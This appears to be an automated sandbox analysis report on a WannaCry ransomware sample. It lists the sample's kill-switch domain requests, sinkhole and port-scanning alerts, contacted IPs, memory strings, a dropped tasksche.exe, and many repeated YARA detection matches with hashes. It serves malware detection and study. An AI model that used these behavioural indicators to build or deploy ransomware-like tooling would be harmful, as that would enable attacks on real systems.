Source: Traffic	Snort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.6:49705

Connects to many IPs within the same subnet mask (likely port scanning)

Source: global traffic

TCP traffic: Count: 85 IPs: 107.165.99.30,107.165.99.74,107.165.99.73,107.165.99.72,107.165.99.71,107.165.99.70,107.165.99.38,107.165.99.37,107.165.99.36,107.165.99.35,107.165.99.79,107.165.99.34,107.165.99.78,107.165.99.33,107.165.99.77,107.165.99.32,107.165.99.76,107.165.99.31,107.165.99.75,107.165.99.29,107.165.99.28,107.165.99.63,107.165.99.62,107.165.99.61,107.165.99.60,107.165.99.1,107.165.99.5,107.165.99.27,107.165.99.4,107.165.99.26,107.165.99.25,107.165.99.241,107.165.99.3,107.165.99.69,107.165.99.24,107.165.99.2,107.165.99.68,107.165.99.23,107.165.99.9,107.165.99.67,107.165.99.22,107.165.99.8,107.165.99.66,107.165.99.21,107.165.99.7,107.165.99.65,107.165.99.20,107.165.99.6,107.165.99.64,107.165.99.19,107.165.99.18,107.165.99.17,107.165.99.52,107.165.99.51,107.165.99.50,107.165.99.16,107.165.99.15,107.165.99.59,107.165.99.14,107.165.99.58,107.165.99.13,107.165.99.57,107.165.99.12,107.165.99.56,107.165.99.11,107.165.99.55,107.165.99.10,107.165.99.54,107.165.99.53,107.165.99.41,107.165.99.40,107.165.99.84,107.165.99.83,107.165.99.82,107.165.99.81,107.165.99.80,107.165.99.49,107.165.99.48,107.165.99.47,107.165.99.46,107.165.99.45,107.165.99.44,107.165.99.43,107.165.99.42,107.165.99.39

Source: Joe Sandbox View

ASN Name: EGIHOSTINGUS EGIHOSTINGUS

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache

Source: unknown

Network traffic detected: IP country count 17

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.90
Source: unknown	TCP traffic detected without corresponding DNS query: 137.59.244.89
Source: unknown	TCP traffic detected without corresponding DNS query: 190.118.148.211
Source: unknown	TCP traffic detected without corresponding DNS query: 120.77.189.201
Source: unknown	TCP traffic detected without corresponding DNS query: 203.113.203.78
Source: unknown	TCP traffic detected without corresponding DNS query: 61.49.83.44
Source: unknown	TCP traffic detected without corresponding DNS query: 42.153.119.52
Source: unknown	TCP traffic detected without corresponding DNS query: 12.119.25.17
Source: unknown	TCP traffic detected without corresponding DNS query: 86.18.224.16
Source: unknown	TCP traffic detected without corresponding DNS query: 168.248.8.247
Source: unknown	TCP traffic detected without corresponding DNS query: 62.24.28.70
Source: unknown	TCP traffic detected without corresponding DNS query: 162.149.186.105
Source: unknown	TCP traffic detected without corresponding DNS query: 95.151.132.161
Source: unknown	TCP traffic detected without corresponding DNS query: 11.111.31.149
Source: unknown	TCP traffic detected without corresponding DNS query: 190.108.6.156
Source: unknown	TCP traffic detected without corresponding DNS query: 146.15.103.115
Source: unknown	TCP traffic detected without corresponding DNS query: 143.34.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 200.42.254.144
Source: unknown	TCP traffic detected without corresponding DNS query: 181.13.26.231
Source: unknown	TCP traffic detected without corresponding DNS query: 89.115.165.85
Source: unknown	TCP traffic detected without corresponding DNS query: 217.209.229.25
Source: unknown	TCP traffic detected without corresponding DNS query: 75.204.201.85
Source: unknown	TCP traffic detected without corresponding DNS query: 153.69.48.166
Source: unknown	TCP traffic detected without corresponding DNS query: 153.222.136.183
Source: unknown	TCP traffic detected without corresponding DNS query: 201.9.113.86
Source: unknown	TCP traffic detected without corresponding DNS query: 108.64.144.230

Source: stN592INV6.exe	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000001.00000002.619089050.0000000000C12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/&h
Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer
Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/2h
Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/L
Source: stN592INV6.exe, 00000001.00000002.618210719.000000000019C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
Source: stN592INV6.exe, 00000001.00000002.619089050.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comTERNAME
Source: stN592INV6.exe, 00000001.00000002.619089050.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comx86)
Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000B02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.kryptoslogic.com

Source: unknown

DNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache

Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Detected Wannacry Ransomware

Source: C:\Windows\tasksche.exe

Code function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!

2_2_004014A6

Yara detected Wannacry ransomware

Source: Yara match	File source: stN592INV6.exe, type: SAMPLE
Source: Yara match	File source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.24fc8c8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.250b948.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.stN592INV6.exe.1feb104.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.349998939.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.353120233.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stN592INV6.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stN592INV6.exe PID: 6052, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\tasksche.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: stN592INV6.exe, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: stN592INV6.exe, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: stN592INV6.exe, type: SAMPLE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: stN592INV6.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.stN592INV6.exe.1fdc084.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.24fc8c8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.stN592INV6.exe.24fc8c8.9.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.24fc8c8.9.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
Source: 1.2.stN592INV6.exe.250b948.8.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.250b948.8.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.stN592INV6.exe.1feb104.2.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: 1.2.stN592INV6.exe.1feb104.2.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000002.00000000.355218955.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs

Source: stN592INV6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: stN592INV6.exe, type: SAMPLE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: stN592INV6.exe, type: SAMPLE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
